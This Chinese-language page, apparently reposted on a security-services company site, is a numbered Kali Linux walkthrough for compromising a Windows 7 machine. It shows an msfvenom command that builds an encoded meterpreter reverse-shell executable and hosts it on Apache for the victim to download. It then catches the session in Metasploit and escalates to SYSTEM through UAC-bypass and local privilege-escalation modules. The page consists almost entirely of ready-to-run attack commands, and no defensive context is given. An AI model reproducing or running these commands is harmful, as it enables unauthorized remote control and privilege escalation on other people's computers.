kali 绕过uac提权_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

kali 绕过uac提权

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


kali 绕过uac提权

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe  --产生一个exe文件   2. service apache2 start   --开启apache服务 3. service postgresql start --开启msf数据库服务 4. cp ./a.exe /var/www/html/ --在http目录下   5. 打开win7访问kali ip 下载a.exe   6. Msfconsole           --启动msf 7. use exploit/multi/handler   --使用这个模块   8. set payload windows/meterpreter/reverse_tcp  --配置payload   9. set lhost 192.168.2.128  --配置kali  ip   10. set lport 4444    --配置监听端口 和exe文件端口一样 11. Show options   --查看一下参数   12. exploit -j  --开始监听   13. 然后在win7电脑上运行a.Exe   14. 在kali上就会返回一个会话用sessions 查看 15. sessions -i 1  --进入会话   16. load priv   --更新插件   17. Getsystem  --获取权限  发现没有权限 需要提权 18. Background --退出会话   19. use exploit/windows/local/ask --进入提权模块   20. show options  --查看配置参数   21. set payload windows/meterpreter/reverse_tcp --设置payload 22. set lhost 192.168.2.128  --设置kali ip 23. set filename win_update.exe  --设置win弹窗名字 24. set filename win_update.exe --设置会话 25. show options   26. Exploit  --攻击 会多一个会话 27. sessions -i 2  --进入会话 28. load priv 更新插件 29. Getsystem  --提权    --上边那个提权还要弹窗 接下来再说一个模块不需要用户在点击 “是” 30. use exploit/windows/local/bypassuac_injection 31. set payload windows/meterpreter/reverse_tcp 32. Set lhost 192.168.2.128 33. set session 1 34. exploit  --在得到一个提权的会话 35. 还有2个模块可以用提权以下是  模块和payload(参数配置如上) 36. use exploit/windows/local/ms13_053_schlamperei set payload windows/meterpreter/reverse_tcp 37. use exploit/windows/local/ppr_flatten_rec set payload windows/meterpreter/reverse_tcp -- set payload windows/viewomly/reverse_tcp -- set viewonly no(这个payload可以用图型话界面 设置viewonly为 no可以操作)

kali 绕过uac提权